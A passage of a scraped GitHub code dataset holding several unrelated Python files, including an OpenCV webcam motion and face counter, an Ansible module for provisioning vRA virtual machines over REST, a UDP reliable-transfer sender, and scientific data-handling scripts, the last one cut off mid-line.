print(\"EvsentCount\", EventCount)\n # d[0] += EventCount\n except Exception as e:\n print(e)\n\nif __name__ == '__main__':\n with Manager() as manager:\n d = manager.list([0 for i in range(5)])\n print(AllEvent)\n\n p1 = Process(target=CountTotal, args=(d,1,13325))\n # p2 = Process(target=CountTotal, args=(d,13325,AllEvent-13325))\n p1.start()\n # p2.start()\n\n p1.join()\n # p2.join()\n\n print(d)\n\n","repo_name":"jak010/study-python-src","sub_path":"etc/ExampleGroup/MultiProcessing/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17373806353","text":"import numpy as np\r\nimport cv2\r\nimport pandas,time\r\nfrom datetime import datetime\r\nfirst_frame=None\r\nstatus_list=[None,None]\r\ntimes=[]\r\ndf=pandas.DataFrame(columns=[\"Start\",\"End\"])\r\nvid = cv2.VideoCapture(0)\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\nwhile True:\r\n check, frame = vid.read()\r\n status=0\r\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n gray=cv2.GaussianBlur(gray,(21,21),0)\r\n\r\n if first_frame is None:\r\n first_frame=gray\r\n continue\r\n\r\n delta_frame=cv2.absdiff(first_frame,gray)\r\n thresh_frame=cv2.threshold(delta_frame, 30, 255, cv2.THRESH_BINARY)[1]\r\n thresh_frame=cv2.dilate(thresh_frame, None, iterations=2)\r\n\r\n (_,cnts,_)=cv2.findContours(thresh_frame.copy(),cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n for contour in cnts:\r\n if cv2.contourArea(contour) < 10000:\r\n continue\r\n status=1\r\n\r\n (x, y, w, h)=cv2.boundingRect(contour)\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0,255,0), 3)\r\n status_list.append(status)\r\n\r\n status_list=status_list[-2:]\r\n\r\n\r\n if status_list[-1]==1 and status_list[-2]==0:\r\n times.append(datetime.now())\r\n if status_list[-1]==0 and status_list[-2]==1:\r\n times.append(datetime.now())\r\n\r\n\r\n\r\n cv2.imshow(\"Gray Frame\",gray)\r\n cv2.imshow(\"Delta Frame\",delta_frame)\r\n cv2.imshow(\"Threshold Frame\",thresh_frame)\r\n cv2.imshow(\"Color Frame\",frame)\r\n\r\n faces = face_cascade.detectMultiScale(gray)\r\n print(faces)\r\n if len(faces) == 0:\r\n print (\"No faces found\")\r\n\r\n else:\r\n print(faces)\r\n print(faces.shape)\r\n print (\"Number of faces detected: \" + str(faces.shape[0]))\r\n\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(image,(x,y),(x+w,y+h),(0,255,0),1)\r\n\r\n cv2.rectangle(image, ((0,image.shape[0] -25)),(800, image.shape[0]), (255,255,255), -1)\r\n cv2.putText(image, \"Number of faces detected: \" + str(faces.shape[0]), (0,image.shape[0] -10), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0,0,0), 1)\r\n\r\n cv2.imshow('Image with faces',image)\r\n cv2.waitKey(0)\r\n\r\n key=cv2.waitKey(1)\r\n\r\n if key==ord('q'):\r\n if status==1:\r\n times.append(datetime.now())\r\n break\r\n\r\n\r\n\r\nprint(status_list)\r\nprint(times)\r\nfor i in range(0,len(times),2):\r\n df=df.append({\"Start\":times[i],\"End\":times[i+1]},ignore_index=True)\r\n\r\ndf.to_csv(\"Times.csv\")\r\n\r\nvideo.release()\r\ncv2.destroyAllWindows\r\n","repo_name":"divyadharshinichinnan/crowd-management-","sub_path":"count/people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9510551494","text":" #!/usr/bin/python\n\nSOCKET_TIMEOUT = 30\nDEFAULT_TENANT = 'vsphere.local'\nDEFAULT_MEMORY = 512\nDEFAULT_CPUS = 1\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: vravm\nshort_description: A module that wraps the vRA 7 REST calls.\nversion_added: \"2.4\"\ndescription:\n - This module provides a wrapper for making vRA API REST calls to a specific\n vRA instance.\noptions:\n host:\n description:\n - This is vRA host name.\n required: true\n rest_method:\n description:\n - The name of the REST method to call on the host.\n required: true\n username:\n description:\n - The user name to use when logging into the vRA instance to\n retrieve a bearer token.\n required: false\n password:\n description:\n - The password for the user logging into the vRA instance to\n retrieve a bearer token.\n required: false\n vm_template:\n description:\n - The JSON blueprint template object that acts as the configuration\n for the VM to be provisioned.\n required: false\n tenant:\n description:\n - The tenant for the user making the REST call. This will default\n to \"vsphere.local\".\n required: false\n token:\n description:\n - The bearer token to use with all calls other than the one to\n retrieve the bearer token.\n required: false\n catalog_item_id:\n description:\n - The ID of the catalog item that is to be the target of the method\n execution.\n required: false\nauthor:\n - Todd Blackwell (@vmware.com)\n'''\n\nEXAMPLES = '''\n# Retrieve a bearer token\n- name: Get a Bearer Token\n vra7rest:\n host: vra-01a.corp.local\n rest_method: get_bearer_token\n username: jason\n password: VMware1!\n tenant: vsphere.local\n'''\n\nRETURN = '''\noriginal_message:\n description: The original name param that was passed in\n type: str\nmessage:\n description: The output message that the sample module generates\n'''\n\nimport json\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.urls import fetch_url, url_argument_spec\n\ndef set_json_value(json, path_list, new_value):\n\n if len(path_list) > 1:\n outer_most_path_element = path_list.pop(0)\n sub_json_object = json[outer_most_path_element]\n set_json_value(sub_json_object, path_list, new_value)\n else:\n json[path_list[0]] = new_value\n\ndef main():\n # Define the parameters that a user can pass into this module.\n module_args = dict(\n host=dict(type='str', required=True),\n username=dict(type='str', required=True),\n password=dict(type='str', required=True, no_log=True),\n tenant=dict(type='str', required=False, default=DEFAULT_TENANT),\n blueprint_name=dict(type='str', required=False),\n memory=dict(type='str', required=False, default=DEFAULT_MEMORY),\n cpu_count=dict(type='str', required=False, default=DEFAULT_CPUS),\n number_of_instances=dict(type='str', required=False, default='1'),\n wait_for_vm=dict(type='str', required=False, default=False),\n validate_certs=dict(type='str', required=False)\n )\n\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': '',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n # seed the result dict in the object\n # we primarily care about changed and state\n # change is if this module effectively modified the target\n # state will include any data that you want your module to pass back\n # for consumption, for example, in a subsequent task\n result = dict(\n result_text='',\n output=''\n )\n\n # the AnsibleModule object will be our abstraction working with Ansible\n # this includes instantiation, a couple of common attr would be the\n # args/params passed to the execution, as well as if the module\n # supports check mode\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n host = module.params['host']\n username = module.params['username']\n password = module.params['password']\n tenant = module.params['tenant']\n blueprint_name = module.params['blueprint_name']\n memory = module.params['memory']\n cpu_count = module.params['cpu_count']\n number_of_instances = module.params['number_of_instances']\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': '',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n #===========================================================================\n # The first step is to get the bearer token.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/identity/api/tokens'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json'}\n body_json = {'username': username,\n 'password': password,\n 'tenant': tenant}\n body = json.dumps(body_json)\n\n # Make the REST call to get the bearer token.\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n response_json = json.loads(response_content)\n bearer_token = response_json[\"id\"]\n\n output['bearer_token'] = bearer_token\n\n #===========================================================================\n # Get the list of catalog items.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItemViews'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n catalog_items = json.loads(response_content)['content']\n\n # Find the catalog item that matches the blueprint name passed into this\n # module.\n blueprint_item = {}\n for catalog_item in catalog_items:\n if catalog_item['name'] == blueprint_name:\n blueprint_item = catalog_item\n\n if blueprint_item:\n blueprint_catalog_item_id = blueprint_item['catalogItemId']\n\n output['blueprint_item'] = blueprint_item\n output['blueprint_catalog_item_id'] = blueprint_catalog_item_id\n else:\n raise Exception(\"Blueprint could not be found\")\n\n #===========================================================================\n # Get the blueprint template using the catalog ID.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests/template'\n headers = {'Accept':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n blueprint_template = json.loads(response_content)\n\n output['blueprint_template'] = blueprint_template\n\n #===========================================================================\n # Update the template with the new values supplied by the user.\n #===========================================================================\n blueprint_data_item_name = blueprint_name.replace(' ', '_')\n memory_path = 'data/' + blueprint_data_item_name + '/data/memory'\n cpus_path = 'data/' + blueprint_data_item_name + '/data/cpu'\n number_of_instances_path = 'data/_number_of_instances'\n\n memory_path_list = memory_path.split('/')\n cpus_path_list = cpus_path.split('/')\n number_of_instances_list = number_of_instances_path.split('/')\n\n set_json_value(blueprint_template, memory_path_list, memory)\n set_json_value(blueprint_template, cpus_path_list, cpu_count)\n set_json_value(blueprint_template, number_of_instances_list, number_of_instances)\n\n #===========================================================================\n # Submit the modified blueprint template to provision the VM.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=json.dumps(blueprint_template),\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n output['response'] = response\n output['url'] = url\n output['headers'] = headers\n response_content = response.read()\n blueprint_template = json.loads(response_content)\n\n # If the user is working with this module in only check mode we do not\n # want to make any changes to the environment, just return the current\n # state with no modifications\n if module.check_mode:\n return result\n\n # Use whatever logic you need to determine whether or not this module\n # made any modifications to your target\n if module.params['host']:\n result['changed'] = True\n\n # during the execution of the module, if there is an exception or a\n # conditional state that effectively causes a failure, run\n # AnsibleModule.fail_json() to pass in the message and the result\n if module.params['host'] == 'fail me':\n module.fail_json(msg='You requested this to fail', **result)\n\n #result['output'] = output\n\n # in the event of a successful module execution, you will want to\n # simple AnsibleModule.exit_json(), passing the key/value results\n module.exit_json(**result)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tblackwell/ansible-vra-rest","sub_path":"modules/vravm.py","file_name":"vravm.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"21860069898","text":"import sys\r\nfrom collections import defaultdict, deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m, k = map(int, input().split())\r\n\r\nground = defaultdict(deque)\r\n\r\nnutrition = [\r\n [5] * n\r\n for _ in range(n)\r\n]\r\n\r\nplus_nutrition = [\r\n list(map(int, input().split()))\r\n for _ in range(n)\r\n]\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n # 인덱스를 맞추기 위해 1씩 차감\r\n x -= 1; y -= 1\r\n \r\n # 나무 나이 삽입\r\n ground[(x, y)].append(z)\r\n \r\n# 봄 -> 나무가 자신의 위치에서 나이만큼 양분을 먹고 나이 1 증가\r\n# 그것이 안된다면 죽고, 여름에 해당 위치에 양분으로 남음\r\ndef spring_and_summer(): \r\n # key : 나무가 심어진 좌표 튜플\r\n for key in list(ground.keys()):\r\n x, y = key\r\n # 해당 좌표에 새로 기록할 나무 나이 정보\r\n temp_deque = deque()\r\n \r\n # 현재 좌표에서 죽은 나무\r\n dead_tree = 0\r\n \r\n # 나이가 어린 나무부터 양분을 먹음\r\n for tree_age in ground[key]:\r\n # 양분을 먹을 수 있는 경우 나이만큼 먹고 임시 힙에 삽입\r\n if nutrition[x][y] >= tree_age:\r\n temp_deque.append(tree_age+1) # 임시 큐에 저장\r\n nutrition[x][y] -= tree_age\r\n \r\n # 먹을 수 없다면 죽음\r\n else:\r\n dead_tree += tree_age // 2\r\n\r\n # 새로 기록한 나무 나이 저장\r\n ground[key] = temp_deque\r\n \r\n # 해당 위치에서 죽은 나무로 양분 추가\r\n nutrition[x][y] += dead_tree\r\n\r\n\r\n# 가을에는 나이가 5배수인 나무가 주변 8칸으로 번식\r\ndef autumn_and_winter():\r\n # 나무가 번식하는 주변 위치\r\n dxs = [-1, -1, -1, 0, 0, 1, 1, 1]\r\n dys = [-1, 0, 1, -1, 1, -1, 0, 1]\r\n \r\n for key in list(ground.keys()):\r\n x, y = key\r\n for tree_age in ground[key]:\r\n if tree_age % 5 != 0:\r\n continue\r\n \r\n # 주변 8칸으로 나이가 1인 나무 번식\r\n for dx, dy in zip(dxs, dys):\r\n nx, ny = x + dx, y + dy\r\n \r\n # 땅을 벗어나지 않는다면 해당 칸으로 번식\r\n if 0 <= nx < n and 0 <= ny < n:\r\n ground[(nx, ny)].appendleft(1)\r\n \r\n # 겨울에는 로봇이 땅을 돌아다니며 양분을 추가함\r\n for x in range(n):\r\n for y in range(n):\r\n nutrition[x][y] += plus_nutrition[x][y]\r\n \r\n \r\n# k년 동안 계절 사이클을 반복 후 전체 나무의 개수를 구한다.\r\nfor _ in range(k):\r\n spring_and_summer()\r\n autumn_and_winter()\r\n\r\nanswer = 0\r\nfor key in list(ground.keys()):\r\n answer += len(ground[key])\r\n \r\nprint(answer)","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/16235. 나무 재테크/나무 재테크.py","file_name":"나무 재테크.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12566628400","text":"import sys\r\nimport socket\r\nimport time\r\nimport argparse\r\nfrom STPSegment import STPSegment\r\n\r\nclass Sender:\r\n def __init__(self, sender_port, receiver_port, file_to_send, max_win, rto):\r\n self.sender_port = sender_port\r\n self.receiver_port = receiver_port\r\n self.file_to_send = file_to_send\r\n self.max_win = max_win\r\n self.rto = rto\r\n\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n self.sock.bind(('localhost', self.sender_port))\r\n self.sock.settimeout(0.5)\r\n self.ISN = 0\r\n self.log_file = open(\"sender_log.txt\", \"w\")\r\n self.start_time = None\r\n\r\n def log(self, snd_rcv, packet_type, seq_num, num_bytes):\r\n current_time = time.time()\r\n elapsed_time = round(current_time - self.start_time, 5) if self.start_time is not None else 0\r\n pack_type = \"DATA\"\r\n\r\n if packet_type==1:\r\n pack_type = \"ACK\"\r\n elif packet_type==2:\r\n pack_type = \"SYN\"\r\n elif packet_type==3:\r\n pack_type = \"FIN\"\r\n elif packet_type==4:\r\n pack_type = \"RESET\"\r\n\r\n log_str = f\"{snd_rcv} {elapsed_time}s {pack_type} {seq_num} {num_bytes}\\n\"\r\n self.log_file.write(log_str)\r\n\r\n # DATA = 0, ACK = 1, SYN = 2, FIN = 3, RESET = 4\r\n def send_syn(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=2)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 2, seq_num, 0)\r\n \r\n\r\n def send_fin(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=3)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n\r\n self.log(\"snd\", 3, seq_num, 0)\r\n\r\n def connection_establish(self):\r\n retry_count = 0\r\n self.start_time = time.time()\r\n while retry_count < 3:\r\n try:\r\n self.send_syn(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n\r\n if segment.segment_type==1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n \r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION ESTABLISHING\")\r\n retry_count += 1\r\n \r\n return False\r\n \r\n def connection_terminate(self):\r\n retry_count = 0\r\n while retry_count < 3:\r\n try:\r\n self.send_fin(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n if segment.segment_type==1 and segment.seq_num==self.ISN + 1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION TERMINATION\")\r\n retry_count += 1\r\n \r\n return False\r\n\r\n def send_data(self):\r\n if self.connection_establish():\r\n with open(self.file_to_send, 'rb') as file:\r\n filedata = file.read(1000)\r\n while filedata:\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n # new seq num if the send works\r\n temp_seq = self.ISN + len(filedata)\r\n\r\n ack_received = False\r\n\r\n while not ack_received:\r\n try:\r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n if segment.seq_num >= temp_seq:\r\n # The seq number in the ack matches or is ahead of the one we are about to send out\r\n ack_received = True\r\n self.ISN = segment.seq_num\r\n temp_seq = segment.seq_num\r\n else:\r\n # oh our dat wasnt lost their ack was lost so now they're ahead of us\r\n pass\r\n \r\n except socket.timeout:\r\n # Didnt receive an ack so we can only assume our sent data was lost so resend\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n\r\n self.ISN = temp_seq\r\n time.sleep(0.05)\r\n filedata = file.read(1000)\r\n \r\n # Send the end of transmission segment with FIN flag\r\n if self.connection_terminate():\r\n print(\"COMPLETE PROGRAM\")\r\n \r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Sender')\r\n parser.add_argument('sender_port', type=int, help='Sender port number')\r\n parser.add_argument('receiver_port', type=int, help='Receiver port number')\r\n parser.add_argument('file_to_send', type=str, help='File to send')\r\n parser.add_argument('max_win', type=int, help='Max Window Size in bytes')\r\n parser.add_argument('rto', type=str, help='Retransmission time')\r\n args = parser.parse_args()\r\n\r\n sender = Sender(args.sender_port, args.receiver_port, args.file_to_send, args.max_win, args.rto)\r\n sender.send_data()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"mira-moonbeam/simpleSTPwithSlidingWindow","sub_path":"Sender.py","file_name":"Sender.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9094876651","text":"import numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport pandas as pd\n\ndef sel_train_data_lead(nc_in_file,target_len,\n s_target_date,e_target_date,\n rw_1,lead_time,rw,ntimestep):\n '''\n This function inputs a 2-D file.nc, reads it as a xarray and creates\n a predictor array. 1_D:time, 2_D:features\n \n The length of the target time series must be given (target_len).\n The start date and end date that we want to predict must be given \n (e.g., s_target_date='16-10-1980', e_target_date='16-12-2021') and\n the running window that was already applied on the predictors with center=False must be\n declared (rw_1). \n \n The predictor is selected in a way so that the \n needed date is predicted at a certain lead time (lead_time) and for a specific running\n window that was applied on the target with center=True (rw). If center=False, then set rw=0.\n Moreover, a selected time step for the LSTM \n is considered (ntimestep).\n '''\n \n print('starting')\n\n SDD = int(s_target_date[0:2])\n SMM = int(s_target_date[3:5])\n SYY=int(s_target_date[6:10])\n print('start target date',SDD,SMM,SYY)\n\n EDD = int(e_target_date[0:2])\n EMM = int(e_target_date[3:5])\n EYY = int(e_target_date[6:10])\n print('end target',EDD,EMM,EYY)\n\n half_rw = int(rw/2)\n \n # Create correctly formated datetime\n date_target = datetime.strftime(datetime(year=SYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n \n # Initialize shape of the final predictor array\n \n pc_predictor = [] # np.ndarray((target_len,ntimestep,int(nc_in_file[var_name].shape[1])))\n time_list = []\n it = 0\n ii = 0\n YYY = SYY\n while YYY < EYY+1:\n if YYY not in [2005,2007,2018,2004,2006]:\n date_start = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1+ntimestep-1),\"%Y.%m.%d\")\n date_end = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1),\"%Y.%m.%d\")\n #print(date_target,date_start,date_end,it)\n f = nc_in_file.sel(time = slice(date_start,date_end))\n f=f.assign_coords(time=range(ntimestep))\n time_list.append(date_target)\n pc_predictor.append(f)\n if date_target == datetime.strftime(datetime(year=YYY,month=EMM,day=EDD),\"%Y.%m.%d\"):\n YYY = YYY+1\n date_target = datetime.strftime(datetime(year=YYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n it = 0\n #print(YYY)\n else:\n it = 1\n ii = ii+1\n date_target = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")+timedelta(days=it),\"%Y.%m.%d\") \n pc_predictor = xr.concat(pc_predictor,\"new_time\").rename({\"time\":\"lag\"}).rename({\"new_time\":\"time\"})\n pc_predictor = pc_predictor.assign_coords(time=time_list)\n pc_predictor = pc_predictor.assign_coords(time=pd.DatetimeIndex(pc_predictor.time)) #-pd.Timedelta(\"15 d\"))\n #print('pc_predictor_shape',pc_predictor.shape)\n return pc_predictor\n ","repo_name":"ZhengWinnieWu/Lorentz_workshop","sub_path":"L_functions.py","file_name":"L_functions.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"35352813903","text":"def XYToCell(self, x, y):\n # For virtual grids, XYToCell doesn't work properly\n # For some reason, the width and heights of the labels\n # are not computed properly and thw row and column\n # returned are computed as if the window wasn't\n # scrolled\n # This function replaces XYToCell for Virtual Grids\n\n rowwidth = self.GetGridRowLabelWindow().GetRect().width\n colheight = self.GetGridColLabelWindow().GetRect().height\n yunit, xunit = self.GetScrollPixelsPerUnit()\n xoff = self.GetScrollPos(wxHORIZONTAL) * xunit\n yoff = self.GetScrollPos(wxVERTICAL) * yunit\n\n # the solution is to offset the x and y values\n # by the width and height of the label windows\n # and then adjust by the scroll position\n # Then just go through the columns and rows\n # incrementing by the current column and row sizes\n # until the offset points lie within the computed\n # bounding boxes.\n x += xoff - rowwidth\n xpos = 0\n for col in range(self.GetNumberCols()):\n nextx = xpos + self.GetColSize(col) \n if xpos <= x <= nextx:\n break\n xpos = nextx\n\n y += yoff - colheight\n ypos = 0\n for row in range(self.GetNumberRows()):\n nexty = ypos + self.GetRowSize(row)\n if ypos <= y <= nexty:\n break\n ypos = nexty\n\n return row, col\n\n \t \t \n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/45c/45ce120feaa2c1a2bb53db6c8fb833e58d6bb661/7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_name":"7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37137386899","text":"import argparse\nparser = argparse.ArgumentParser(prog='subset_pheno_covar_by_indiv.py', description='''\n Input1: pheno_covar table obtained from ukbREST along with post-QCs\n Input2: YAML file defining which columns are phenotypes and covariates\n Input3: a list of individual ID\n Output: the phenotype and covariate for the subset of individuals\n''')\n\nparser.add_argument('--pheno-covar-csv', required=True, help='''\n Phenotype table obtained from ukbREST \n''')\nparser.add_argument('--pheno-covar-yaml', required=True, help='''\n YAML file telling which columns are phenotype and covariates\n''')\nparser.add_argument('--indiv-list', required=True, help='''\n The list of individuals (it can have several columns but the first one \n will be treated as individual ID)\n''')\nparser.add_argument('--output-pheno', required=True, help='''\n Phenotype table for subset individuals\n''')\nparser.add_argument('--output-covar', required=True, help='''\n Covariate table for subset individuals\n''')\nparser.add_argument('--indiv-colname', default='eid', help='''\n Column name of individual ID in input\n''')\n\nargs = parser.parse_args()\n\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport logging, os, time, sys\nimport my_hail_helper as hail_helper\nimport gwas_helper\n\n\n# configing util\nlogging.basicConfig(\n level = logging.INFO, \n stream = sys.stderr, \n format = '%(asctime)s %(message)s',\n datefmt = '%Y-%m-%d %I:%M:%S %p'\n)\n\n# load phenotypes and covariates (Exactly the same as gwas_build_pheno_and_covar.py)\nlogging.info('Start loading phenotypes and covariates (the full table)')\npheno_covar_dic = gwas_helper.read_yaml(args.pheno_covar_yaml)\ncovar_names = pheno_covar_dic['covar_names'] # 'age_recruitment,sex,pc1,pc2'\npheno_names = pheno_covar_dic['pheno_names'] # 'ht,mcv,mch'\nindiv_id = pheno_covar_dic['indiv_id'] # 'eid'\nint_names = pheno_covar_dic['int_names'] # 'age_recruitment,sex'\nstr_names = pheno_covar_dic['str_names'] # 'eid'\nlogging.info('--> Read in CSV file as data.frame')\ntstart = time.time()\ncovar, trait = hail_helper.read_and_split_phenotype_csv(\n args.pheno_covar_csv,\n pheno_names = pheno_names,\n covar_names = covar_names,\n indiv_id = indiv_id,\n int_names = int_names,\n str_names = str_names\n)\ntend = time.time()\nlogging.info('--> Read in CSV file as data.frame FINISHED! {} seconds elapsed'.format(tend - tstart))\n\n# read individual list\nlogging.info('Read individual list')\nindiv_list = hail_helper.read_indiv_list(args.indiv_list)\n\n# subsetting\ntrait_sub = hail_helper.subset_by_col(trait, args.indiv_colname, indiv_list)\ncovar_sub = hail_helper.subset_by_col(covar, args.indiv_colname, indiv_list)\n\n# save as TSV\ntrait_sub.to_csv(args.output_pheno, header = True, index = None, sep = '\\t')\ncovar_sub.to_csv(args.output_covar, header = True, index = None, sep = '\\t')\n","repo_name":"liangyy/ptrs-ukb","sub_path":"code/subset_pheno_covar_by_indiv.py","file_name":"subset_pheno_covar_by_indiv.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40644057541","text":"'''Import tasks for the Supernova Legacy Survey.\n'''\nimport csv\nimport os\nfrom glob import glob\nfrom math import log10\n\nfrom astrocats.catalog.utils import (get_sig_digits, pbar, pbar_strings,\n pretty_num)\nfrom astropy.time import Time as astrotime\nfrom astroquery.vizier import Vizier\n\nfrom ..supernova import SUPERNOVA\n\n\ndef do_snls_photo(catalog):\n task_str = catalog.get_current_task_str()\n snls_path = os.path.join(catalog.get_current_task_repo(), 'SNLS-ugriz.dat')\n data = list(csv.reader(open(snls_path, 'r'), delimiter=' ',\n quotechar='\"', skipinitialspace=True))\n for row in pbar(data, task_str):\n flux = row[3]\n err = row[4]\n # Being extra strict here with the flux constraint, see note below.\n if float(flux) < 3.0 * float(err):\n continue\n name = 'SNLS-' + row[0]\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2010A&A...523A...7G')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n band = row[1]\n mjd = row[2]\n sig = get_sig_digits(flux.split('E')[0]) + 1\n # Conversion comes from SNLS-Readme\n # NOTE: Datafiles avail for download suggest diff zeropoints than 30,\n # need to inquire.\n magnitude = pretty_num(30.0 - 2.5 * log10(float(flux)), sig=sig)\n e_mag = pretty_num(\n 2.5 * log10(1.0 + float(err) / float(flux)), sig=sig)\n # e_mag = pretty_num(2.5*(log10(float(flux) + float(err)) -\n # log10(float(flux))), sig=sig)\n catalog.entries[name].add_photometry(\n time=mjd, band=band, magnitude=magnitude, e_magnitude=e_mag,\n counts=flux, e_counts=err, source=source)\n\n catalog.journal_entries()\n return\n\n\ndef do_snls_spectra(catalog):\n \"\"\"\n \"\"\"\n\n task_str = catalog.get_current_task_str()\n result = Vizier.get_catalogs('J/A+A/507/85/table1')\n table = result[list(result.keys())[0]]\n table.convert_bytestring_to_unicode(python3_only=True)\n datedict = {}\n for row in table:\n datedict['SNLS-' + row['SN']] = str(astrotime(row['Date']).mjd)\n\n oldname = ''\n file_names = glob(os.path.join(catalog.get_current_task_repo(), 'SNLS/*'))\n for fi, fname in enumerate(pbar_strings(file_names, task_str)):\n filename = os.path.basename(fname)\n fileparts = filename.split('_')\n name = 'SNLS-' + fileparts[1]\n name = catalog.get_preferred_name(name)\n if oldname and name != oldname:\n catalog.journal_entries()\n oldname = name\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2009A&A...507...85B')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n\n catalog.entries[name].add_quantity(\n SUPERNOVA.DISCOVER_DATE, '20' + 